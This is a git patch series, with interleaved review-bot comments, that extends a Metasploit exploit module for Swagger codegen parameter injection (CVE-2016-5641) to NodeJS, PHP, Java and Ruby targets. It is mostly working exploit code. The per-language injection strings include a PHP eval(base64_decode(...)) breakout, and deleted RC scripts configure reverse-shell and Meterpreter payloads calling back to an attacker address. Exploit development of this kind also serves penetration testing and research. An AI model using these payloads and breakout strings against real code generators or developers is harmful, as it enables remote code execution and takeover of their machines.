From 7a36d03fe3a2b0280a287aa27dcdc9fb3b9fa593 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 12:34:51 -0500
Subject: [PATCH 1/7] Trying multi arch
---
 .../multi/fileformat/swagger_param_inject.rb | 47 +++++++++++++++----
 1 file changed, 39 insertions(+), 8 deletions(-)
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index f8bdc91882..5759538220 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -16,6 +16,8 @@ require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::FILEFORMAT
 def initialize(info = {})
@@ -40,14 +42,21 @@ class MetasploitModule < Msf::Exploit::Remote
 [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
 [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
 ],
- 'Platform' => %w{ nodejs },
- 'Arch' => ARCH_NODEJS,
- 'Targets' => [['Automatic', {}]],
+ 'Platform' => %w{ nodejs php java ruby },
+ 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY },
+ 'Targets' => [
+ ['Automatic', {}],
+ ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
+ ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
+ ['Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ],
+ ['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ]
+ ],
 'DisclosureDate' => 'Jun 23 2016',
 'DefaultTarget' => 0))
 register_options(
 [
+ OptString.new('FILENAME', [false, 'The file to write.', 'msf-swagger.json']),
 OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
 OptPort.new('LPORT', [true, 'Server port.']),
 OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
@@ -118,12 +127,34 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
- # NodeJS only, for now.
- wrapped_payload = datastore['PAYLOAD_PREFIX'] +
- payload.encoded + datastore['PAYLOAD_SUFFIX']
- datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+ if datastore['PAYLOAD']
+ case payload.arch[0]
+ when 'nodejs'
+ wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+ payload.encoded + datastore['PAYLOAD_SUFFIX']
+ datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+ when 'php'
+ wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+ Base64.strict_encode64(payload.encoded) +
+ datastore['PAYLOAD_SUFFIX']
+ datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ when 'ruby'
+ wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+ payload.encoded + datastore['PAYLOAD_SUFFIX']
+ datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ when 'java'
+ p = payload.encoded.gsub(/<%@page import="/, 'import ')
+ p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
+ p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
+ wrapped_payload = datastore['PAYLOAD_PREFIX'] +
+ p + datastore['PAYLOAD_SUFFIX']
+ datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ end
+ else
+ print_error("No payload defined!")
+ end
+ print_status swagger
 file_create swagger
 end
- end
From ffabf265932c6203d24ce0ba6588347ea3cb923b Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 12:50:23 -0500
Subject: [PATCH 2/7] No Automatic target.
---
 modules/exploits/multi/fileformat/swagger_param_inject.rb | 1 -
 1 file changed, 1 deletion(-)
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index 5759538220..a322cdddb9 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
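Review bot: The `else` branch only prints `No payload defined!` and then falls through to `print_status swagger` and `file_create swagger`, so a misconfigured run still writes a document that carries no payload; the error path should stop, e.g. `fail_with(Failure::BadConfig, 'No payload defined!')` in place of the `print_error`. The `case payload.arch[0]` likewise has no `else`, so an arch outside the four listed strings also reaches `file_create` silently; an `else fail_with(Failure::NoTarget, "Unsupported arch: #{payload.arch[0]}")` would make the unsupported-target case explicit. The `def exploit` ... `end` pair lies entirely within the hunk.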
@@ -45,7 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
 'Platform' => %w{ nodejs php java ruby },
 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY },
 'Targets' => [
- ['Automatic', {}],
 ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
 ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
 ['Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ],
From 92c70dab6f59319e18983f1eb32a500b36b280cc Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 13:22:21 -0500
Subject: [PATCH 3/7] Real array, and fix PHP
---
 modules/exploits/multi/fileformat/swagger_param_inject.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index a322cdddb9..0f3da9df33 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
 [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
 ],
 'Platform' => %w{ nodejs php java ruby },
- 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY },
+ 'Arch' => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ],
 'Targets' => [
 ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
 ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
From 464808d825bed94a67394a27b9a3daf168d41a06 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 14:43:37 -0500
Subject: [PATCH 4/7] First, put the RC data in the module proper
---
 .../multi/fileformat/swagger_param_inject.rb | 38 ++++++++++++-------
 1 file changed, 25 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index 0f3da9df33..1ccfa8a109 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -60,9 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
 OptPort.new('LPORT', [true, 'Server port.']),
 OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
 OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
- OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
 OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
- OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
+ OptString.new('INFO_VERSION', [true, 'Swagger info version.', '1.0.0']),
 OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
 OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
 OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
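Review bot: `PAYLOAD_PREFIX` and `PAYLOAD_SUFFIX` remain registered here while this same patch removes `PAYLOAD_LOC` and, in its next hunk, fixes the insertion point, prefix and suffix per target, so only the Java branch still reads these two options. Either retire them alongside `PAYLOAD_LOC` or narrow their descriptions, e.g. `'Payload Injection prefix (Java target only)'`, so users of the other targets are not led to set options that are ignored. The `register_options` call begins and ends outside this hunk.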
@@ -129,25 +128,38 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['PAYLOAD']
 case payload.arch[0]
 when 'nodejs'
- wrapped_payload = datastore['PAYLOAD_PREFIX'] +
- payload.encoded + datastore['PAYLOAD_SUFFIX']
- datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+ payload_loc = 'PATH'
+ payload_prefix = "/a');};};return exports;}));"
+ payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
+ wrapped_payload = payload_prefix +
+ payload.encoded +
+ payload_suffix
+ datastore[payload_loc] = wrapped_payload.gsub(/"/, '\\"')
 when 'php'
- wrapped_payload = datastore['PAYLOAD_PREFIX'] +
- Base64.strict_encode64(payload.encoded) +
- datastore['PAYLOAD_SUFFIX']
- datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ payload_loc = 'INFO_DESCRIPTION'
+ payload_prefix = "*/ namespace foobar; eval(base64_decode('"
+ payload_suffix = "')); /*"
+ wrapped_payload = payload_prefix +
+ Base64.strict_encode64(payload.encoded) +
+ payload_suffix
+ datastore[payload_loc] = wrapped_payload
 when 'ruby'
- wrapped_payload = datastore['PAYLOAD_PREFIX'] +
- payload.encoded + datastore['PAYLOAD_SUFFIX']
- datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ payload_loc = 'INFO_TITLE'
+ payload_prefix = "=end "
+ payload_suffix = "=begin "
+ wrapped_payload = payload_prefix +
+ payload.encoded +
+ payload_suffix
+ datastore[payload_loc] = wrapped_payload
 when 'java'
+ payload_loc = 'PATH'
+ payload_prefix = "a\\\"; "
 p = payload.encoded.gsub(/<%@page import="/, 'import ')
 p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
 p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
 wrapped_payload = datastore['PAYLOAD_PREFIX'] +
 p + datastore['PAYLOAD_SUFFIX']
- datastore[datastore['PAYLOAD_LOC']] = wrapped_payload
+ datastore[payload_loc] = wrapped_payload
 end
 else
 print_error("No payload defined!")
From 08d08d2c951f293490e57758a27ebc15a7340b9b Mon Sep 17 00:00:00 2001
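Review bot: In the `when 'java'` branch the new `payload_prefix = "a\\\"; "` is assigned but never read: the unchanged `wrapped_payload = datastore['PAYLOAD_PREFIX'] +` line still takes its prefix from the datastore, unlike the three other branches, which concatenate their local `payload_prefix`/`payload_suffix`. The same dead assignment survives patch 5/7's hunk, which rewrites that line to `datastore['PAYLOAD_PREFIX'] + p` and changes the literal to `%q{...}` without ever using it; either the local is what should be concatenated, as in the other branches, or it should be dropped. Separately, writing the result back with `datastore[payload_loc] = wrapped_payload` mutates user-visible options as a side effect, so a later run against a different target presumably keeps the previous target's value in `INFO_TITLE`/`INFO_DESCRIPTION`/`PATH`; building the document from a local copy of the values would avoid that. The enclosing `exploit` method begins and ends outside this hunk.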
From: Tod Beardsley
Date: Thu, 23 Jun 2016 14:51:26 -0500
Subject: [PATCH 5/7] Fix Java payload generator
---
 modules/exploits/multi/fileformat/swagger_param_inject.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index 1ccfa8a109..4c7c7878b3 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -153,12 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote
 datastore[payload_loc] = wrapped_payload
 when 'java'
 payload_loc = 'PATH'
- payload_prefix = "a\\\"; "
+ payload_prefix = %q{a\\\"; "}
 p = payload.encoded.gsub(/<%@page import="/, 'import ')
 p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
 p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
- wrapped_payload = datastore['PAYLOAD_PREFIX'] +
- p + datastore['PAYLOAD_SUFFIX']
+ wrapped_payload = datastore['PAYLOAD_PREFIX'] + p
 datastore[payload_loc] = wrapped_payload
 end
 else
From 92522138c5ab0fe974b6a40d457a4d7442849af1 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 14:52:23 -0500
Subject: [PATCH 6/7] Remove the RC files
---
 .../fileformat/swagger_param_inject/java-codegen.rc | 11 -----------
 .../swagger_param_inject/nodejs-codegen.rc | 13 -------------
 .../fileformat/swagger_param_inject/php-codegen.rc | 11 -----------
 .../fileformat/swagger_param_inject/ruby-codegen.rc | 12 ------------
 4 files changed, 47 deletions(-)
 delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc
 delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc
 delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc
 delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc
deleted file mode 100644
index 2139734518..0000000000
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc
+++ /dev/null
@@ -1,11 +0,0 @@
-set PAYLOAD java/jsp_shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "a\\\"; "
-
-set LHOST 192.168.68.138
-set LPORT 4444
-
-run
\ No newline at end of file
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc
deleted file mode 100644
index 36a24b256f..0000000000
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc
+++ /dev/null
@@ -1,13 +0,0 @@
-set PAYLOAD nodejs/shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set INFO_VERSION "1.0.0"
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "/a');};};return exports;}));"
-set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
-
-set LHOST 192.168.68.138
-set LPORT 4444
-
-run
\ No newline at end of file
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc
deleted file mode 100644
index fd7502cf9b..0000000000
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc
+++ /dev/null
@@ -1,11 +0,0 @@
-set PAYLOAD php/meterpreter/reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
-set PAYLOAD_SUFFIX "')); /*"
-
-set LHOST 192.168.68.138
-set LPORT 4444
-
-run
\ No newline at end of file
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc
deleted file mode 100644
index a69fdda505..0000000000
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc
+++ /dev/null
@@ -1,12 +0,0 @@
-set PAYLOAD ruby/shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "INFO_TITLE"
-set PAYLOAD_PREFIX "=end "
-set INFO_DESCRIPTION "=begin "
-
-set LHOST 192.168.68.138
-set LPORT 4444
-
-run
\ No newline at end of file
From ff741fbc35689f18646fa1efdc383562baf4f125 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 23 Jun 2016 14:53:49 -0500
Subject: [PATCH 7/7] Rename for docs
---
 .../{swagger_param_inject/README.md => swagger_param_inject.md} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename documentation/modules/exploit/multi/fileformat/{swagger_param_inject/README.md => swagger_param_inject.md} (100%)
diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md b/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md
similarity index 100%
rename from documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
rename to documentation/modules/exploit/multi/fileformat/swagger_param_inject.md